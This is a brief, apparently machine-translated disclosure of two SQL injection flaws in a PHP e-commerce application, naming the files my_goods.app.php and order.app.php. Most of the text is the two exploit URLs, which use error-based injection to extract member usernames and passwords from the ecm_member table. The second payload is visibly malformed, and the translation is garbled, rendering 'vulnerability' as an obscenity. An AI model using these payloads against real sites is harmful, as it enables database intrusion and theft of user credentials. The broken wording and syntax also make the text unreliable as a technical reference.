Fuck one: \ app \ my_goods.app.php (row 2290)
Fuck one EXP register a member-Log On-submit the following
Http: // site/index. php? App = my_goods & act = brand_edit & id = 1 and (select 1 from (select count (*), concat (select concat (0x7e27, ecm_member.user_name, 0x27, 0x7e, ecm_member.password, 0x7e, 0x27) from ecm_member limit 0, 1) from information_schema.tables limit 0, 1), floor (rand (0) * 2 )) x from information_schema.tables group by x))
Fuck two: \ app \ order. app. php (row 374)
Fuck two EXP register a member-Log On-submit the following
A http://www.2cto.com/index. php? App = order & act = check_coupon & coupon_sn = 1 & store_id = 1 and (select 1 from (select count (*), concat (select concat (0x7e, 0x27, ecm_member.user_name, 0x27, 0x7e, ecm_member.password, 0x7e, 0x27) from ecm_member limit 0, 1) from information_schema.tables limit 0, 0), floor) * 2) x from information_schema.tables group by x))
Fixed: Filtering